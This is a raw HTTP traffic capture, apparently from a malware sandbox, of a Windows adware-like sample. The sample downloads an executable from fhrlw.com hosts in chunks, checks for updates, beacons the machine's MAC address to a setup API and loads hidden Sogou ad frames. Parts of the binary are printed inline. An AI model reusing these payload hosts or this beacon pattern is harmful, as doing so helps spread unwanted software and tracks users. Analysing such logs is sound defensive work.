...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?..t..1.f.|A...o..@...M.......k#.~..N..4.9`.x.>.l".q.........x.8...{Ze>=!s.....}./...$\9<L.p_.n..0.d....8%Y6...@.9...!"UU...6..p'.....D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db.......I....B..\x*.[:.dF..VY....$"..b.".\4..1@...30....&w......S..\.....TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9.......{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..OL...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.b...n....X;....j.X$D..}....j6..)..@..b.............?F..^...!.....*.w.T@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^<..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,.....`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.......E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A....#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!..e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<....O.....Q8..g.%..P.Y...`.N...t.#.oh@.FiuA.........o...d=.qWD.7...x
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=0-204800
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 0-204800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:48 GMT
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u...u...u.......w...u...........d.......|.......t...Richu...................PE..L.....UH.................b....... ..o5............@..........................P......m.%..................................................@............$.(............................................................................................text...x`.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata...`...............................rsrc....@.......B..................@..@................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......D..H.P.u..u..u...T.@..X...SV.5..D..E.WP.u...X.@..e...E..E.P.u...\.@..}..e..9}...D.@........FP.VT........ M............U....M....3...3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...e....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.RD.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$....D...Si.. ..VW.T.....tO.q.3.;5..D.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..D.r._
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1843200-2048000
Host: dl1.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1843200-2048000/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:01 GMT
MU/.`...u.<2r.../.h."........j....?.0...:\..xP."?../Y....fA.........z.*.R..Qq....;Yy(...w*..S.....T.......7..o..D.......9....2.H.o..,.9.mq.J.'.=`......v>../.o....l.U.2[m.....i.i5Q...$.vi........'.x..SZ..mp...N..G..].....$YAd..zR....I..P.2....w.r.e....?....:.W.".....n..'&5<..L.8.).....y....kOc...J.[..h..2..u=_a.-.....P...E5....5.J..5.Udb.)....[.e..$$D.....M...6..I&.%v:.R.Q......R...$...D..M.IE...w$....,.[.e..k..n<%!..N...r.v.t; ..F7.....}.IaT.XT..!`...<.....I7.Y..t. '..<.~m#....E..q.....rZ...{.*&..O.....A..s6j$..;..\.C?.)FZ.K.o.[.1.....7...eF..KQ..X......R..>4E....<a|5..60..th0.A..k...S-.y.-.m..cE....,....;A..K&&.s.e~u.D.X.-..t.....X.X.R..../.*v..V...c[..........f6...<.......l...]..q...>...,.1dB<...Bt.l..X..r`.=..m..R2..|)#ZP......f.%..;/]"<.y_.....y.C.!.@0-.........^..............l....^..<.p.6.7..n9.'......].....D...z'.....P.....P5b...1..Z.P.Oj.daL.....Dz.._.\-.|].D@...oi..).. L..!..4.)z.m.Z...ng.c%.%....lSh..........W._p*..T.N.......?...".=..6.......C..t.q..E.<...O......Z.D......h.YM.......M.R$.S.... .*..9v..Z#.....2:..C....a.3...V .@.@TO.R`;xS......6.r]F4..!..\.EC.@.5x.}...x..[..T...U.q.....Z0.._r.r......d......'y...A3Y....4.P=S...x...].....b.Q..I.H...Tw..^..k.S.=...Y........D...i.]...g...........b.......;!F*.0....A...ZT..-T&.''.2.[..,...T2..m..T*=..gK8.U.7.m.^?..............BZ......C...1~!.g.1....2r...L~..8..z..Gn$...(.\V}. ..../.,.*.......k:.=...xp.E.s[.y..}....".T..%.;./k.x=3<..io...:2Z..B......8hm.}..K..>.*..'...b..DJ..@....7......{n......b..`@...r}.....I$.@
<<
<<< skipped >>>
GET /app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif HTTP/1.1
Accept: */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 042441fc49b4b85c9d202cbbd0c95096
Expires: Sun, 13 Jul 2014 16:07:20 GMT
Cache-Control: max-age=2592000
Last-Modified: Fri, 13 Jun 2014 16:07:20 GMT
4a5b..GIF89a..<...........$..Z.......U..Pw.n...By...............*y.Nj.....l.n.....s..F........S..2......H.q..HZq....`.'...T.U.....&k....,M..9i.P.....H.......................... N,.....2........./........_.o..........................t.....b..............v.............~fs.5`...................w.....y........G~.fw....;v.......Q......e.............~..g..W...b..&...................F.....>U.9i.&q.(a.....j.....b.i.....G...b.............{......d..N..........X.......................".....-B]Bm.Y......6.g...............i.$P....=..5w.0m..e..f..l...J.e.'[."-q.........@P.....d.I................................<==.b.....b............................................................................................................................................................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="adobe:docid:photoshop:3eef0028-c4b0-11e1-b872-a278566b4a1b" xmpMM:DocumentID="xmp.did:FFA472CCDC9F11E3B1B4F5979CC6E9EA" xmpMM:InstanceID="xmp.iid:FFA472CBDC9F11E3B1B4F5979CC
<<
<<< skipped >>>
GET /Update/version.txt?45919992 HTTP/1.1
User-Agent: Update
Host: update.fhrlw.com
HTTP/1.1 200 OK
Content-Length: 72
Content-Type: .txt
Last-Modified: Fri, 13 Jun 2014 08:50:22 GMT
Accept-Ranges: bytes
ETag: "feb72083e486cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:21 GMT
[UpCfg]..Version=1.2.001..Force=1..KillClient=0..MsgTip=0..NoSlience=0....
GET /app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg HTTP/1.1
Accept: */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgstore04.cdn.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 81348f8f42f879e735d0529c30d31e6d
Expires: Mon, 14 Jul 2014 05:41:35 GMT
Cache-Control: max-age=2592000
Last-Modified: Sat, 14 Jun 2014 05:41:35 GMT
bfe2........Exif..II*.................Ducky.......d......hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="adobe:docid:photoshop:fa8c3bce-11f1-11e2-97b7-8b5447d4275b" xmpMM:DocumentID="xmp.did:CD3827A8B5F811E2A6E2F5F05F9AE178" xmpMM:InstanceID="xmp.iid:CD3827A7B5F811E2A6E2F5F05F9AE178" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6430CD75F6B5E21180C4DCB93A6E3ED6" stRef:documentID="adobe:docid:photoshop:fa8c3bce-11f1-11e2-97b7-8b5447d4275b"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................<...................................................................................................!...1.A"..Qa.2#.q..B3$...4...b..%5U.&6FVf.(.Rr.Ccs..e..............................!1..A".Qa.q2#......B..c.'...Rb.3.r.C...$.%6...S4.7G..Ueu............?..U1........[@i...l..i
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:22 GMT
...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?..t..1.f.|A...o..@...M.......k#.~..N..4.9`.x.>.l".q.........x.8...{Ze>=!s.....}./...$\9<L.p_.n..0.d....8%Y6...@.9...!"UU...6..p'.....D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db.......I....B..\x*.[:.dF..VY....$"..b.".\4..1@...30....&w......S..\.....TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9.......{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..OL...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.b...n....X;....j.X$D..}....j6..)..@..b.............?F..^...!.....*.w.T@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^<..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,.....`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.......E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A....#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!..e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<....O.....Q8..g.%..P.Y...`.N...t.#.oh@.FiuA.........o...d=.qWD.7...x
<<
<<< skipped >>>
GET /api/GetConfig.ashx HTTP/1.1
User-Agent: oemfhsli
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:00:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 330
{"errno":"1","bindsoftcount":"0","onlinetimelength":"0","rightdowncount":"1","setupcode":"ae9b8922d6184874896f5561d8fe0643","showminitab":"1","minitabtimer":"61","poptabtimer":"48","minitabrate":"180","poptabrate":"68","silentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrdn.com/eYFE","closePopUrl":"hXXp://cnrdn.com/eYFE"}HTTP/1.1 200 OK..Date: Sat, 14 Jun 2014 09:00:49 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 2.0.50727..Cache-Control: private..Content-Type: text/plain; charset=utf-8..Content-Length: 330..{"errno":"1","bindsoftcount":"0","onlinetimelength":"0","rightdowncount":"1","setupcode":"ae9b8922d6184874896f5561d8fe0643","showminitab":"1","minitabtimer":"61","poptabtimer":"48","minitabrate":"180","poptabrate":"68","silentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrdn.com/eYFE","closePopUrl":"hXXp://cnrdn.com/eYFE"}....
GET /api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=0 HTTP/1.1
User-Agent: oemfhsli
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 38
{"errno":"1","filter":"1","valid":"0"}HTTP/1.1 200 OK..Date: Sat, 14 Jun 2014 09:01:19 GMT..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..X-AspNet-Version: 2.0.50727..Cache-Control: private..Content-Type: text/plain; charset=utf-8..Content-Length: 38..{"errno":"1","filter":"1","valid":"0"}..
GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:43 GMT
Content-Type: text/plain
Content-Length: 142
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:43 2014
X-XSS-Protection: 0
Set-Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; expires=Sun, 14-Jun-15 09:00:43 GMT; max-age=31536000; path=/; domain=.sogou.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"0".}});HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:43 GMT..Content-Type: text/plain..Content-Length: 142..Connection: keep-alive..Cache-Control: no-cache..Pragma: no-cache..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..Expires: Mon, 26 Jul 1997 08:00:00 GMT..Last-Modified: Sat Jun 14 17:00:43 2014..X-XSS-Protection: 0..Set-Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; expires=Sun, 14-Jun-15 09:00:43 GMT; max-age=31536000; path=/; domain=.sogou.com; version=1..P3P: CP=" OTI DSP COR IVA OUR IND COM "..SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"0".}});....
GET /ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Content-Length: 7405
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUID=E7F48AC12141900A539C0F3B000F06DC; path=/; expires=Mon, 13 Jun 2016 09:00:43 GMT; domain=sogou.com
Set-Cookie: ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:43 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
<html>.<head>.<title></title>.<style>.<!--.body{margin:0;background-color:transparent;}..sogou{width:460px; height:60px;position:relative;overflow:hidden;}.a.logo{display:block;height:18px;width:26px;text-align:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cursor:default;position:absolute;bottom:0px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_background:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left top;_background:none;}..sogou a.normal{}.-->.</style>.</head>..<body>.<iframe id="tanxcmiframe" width="0" height="0" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></iframe>.<script type="text/javascript">.var iheight = "60";.var fsize = iheight;.if (iheight >= 30).{. fsize = 30;.}.var mt_preview="0";.if (mt_preview == 1).{.. var height0=60;.. var width0=460;.. if ((width0==120 && height0==600) || (width0==160 && height0==600) || (width0==200 && height0==200) || (width0==250 && height0==250) || (width0==300 && height0==250) || (width0==336 && height0==300) ||
<<
<<< skipped >>>
GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:45 GMT
Content-Type: text/plain
Content-Length: 160
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:45 2014
X-XSS-Protection: 0
SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"1985823318692344632".}});HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 09:00:45 GMT..Content-Type: text/plain..Content-Length: 160..Connection: keep-alive..Cache-Control: no-cache..Pragma: no-cache..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..Expires: Mon, 26 Jul 1997 08:00:00 GMT..Last-Modified: Sat Jun 14 17:00:45 2014..X-XSS-Protection: 0..SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"1985823318692344632".}});....
GET /ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Content-Length: 7404
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ad=vLpiSyllll2FXlDElllllVntR8DlllllZYr1iZllllGlllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:47 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:47 2014
X-XSS-Protection: 0
<html>.<head>.<title></title>.<style>.<!--.body{margin:0;background-color:transparent;}..sogou{width:460px; height:60px;position:relative;overflow:hidden;}.a.logo{display:block;height:18px;width:26px;text-align:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cursor:default;position:absolute;bottom:0px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_background:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left top;_background:none;}..sogou a.normal{}.-->.</style>.</head>..<body>.<iframe id="tanxcmiframe" width="0" height="0" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></iframe>.<script type="text/javascript">.var iheight = "60";.var fsize = iheight;.if (iheight >= 30).{. fsize = 30;.}.var mt_preview="0";.if (mt_preview == 1).{.. var height0=60;.. var width0=460;.. if ((width0==120 && height0==600) || (width0==160 && height0==600) || (width0==200 && height0==200) || (width0==250 && height0==250) || (width0==300 && height0==250) || (width0==336 && height0==300) ||
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1638400-1843200
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1638400-1843200/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:16 GMT
